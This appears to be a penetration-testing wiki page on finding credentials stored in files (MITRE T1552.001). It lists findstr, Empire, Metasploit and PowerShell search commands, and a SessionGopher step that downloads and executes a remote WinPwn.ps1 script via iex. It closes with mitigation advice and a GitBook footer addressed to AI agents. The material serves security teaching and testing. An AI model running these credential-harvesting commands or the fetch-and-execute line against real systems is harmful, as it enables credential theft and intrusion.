> For the complete documentation index, see [llms.txt](https://viperone.gitbook.io/pentest-everything/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/credential-access/unsecured-credentials/credentials-in-files.md).
# Credentials In Files
**ATT\&CK ID:** [T1552.001](https://attack.mitre.org/techniques/T1552/001/)
**Permissions Required:** **Various**
**Description**
Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
It is possible to extract passwords from backups or saved virtual machines through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller.
## Techniques
### CMD
```bash
# Running these commands in the root of c:\ can produce enourmouse output.
findstr /si pass *.xml *.doc *.txt *.xls
findstr /si cred *.xml *.doc *.txt *.xls
```
### Empire
```
powershell/collection/file_finder
powershell/collection/find_interesting_file
powershell/credentials/sessiongopher
```
### Metasploit
```bash
# Meterpreter
# Search by file name from parent directory
search -d -f
search -d c:\\shares -f *password*
# Modules
use post/windows/gather/enum_unattend
use post/windows/gather/credentials/chrome
use post/windows/gather/credentials/gpp
use post/windows/gather/enum_files
# Search all modules
search post/windows/gather/credentials
```
### PowerShell
```powershell
ls -R | select-string -Pattern password
```
### SessionGopher
```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
```
## Mitigation
### Auditing
Through the same or similar methods used in discovery of credentials within files, defenders can identify credential information left on systems and file shares.
### User Training
It is difficult to enact technical controls that mitigate the issue of unsecured credentials within files. Users often leave excel spreadsheets full of passwords on shares and desktops without any protection mechanisms.
It is paramount as a preventative measure to provide end users with training on how to securely store credentials and to understand how unsecured credentials can lead to further compromise of systems and data.
---
# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.
## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:
```
GET https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/credential-access/unsecured-credentials/credentials-in-files.md?ask=&goal=
```
`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.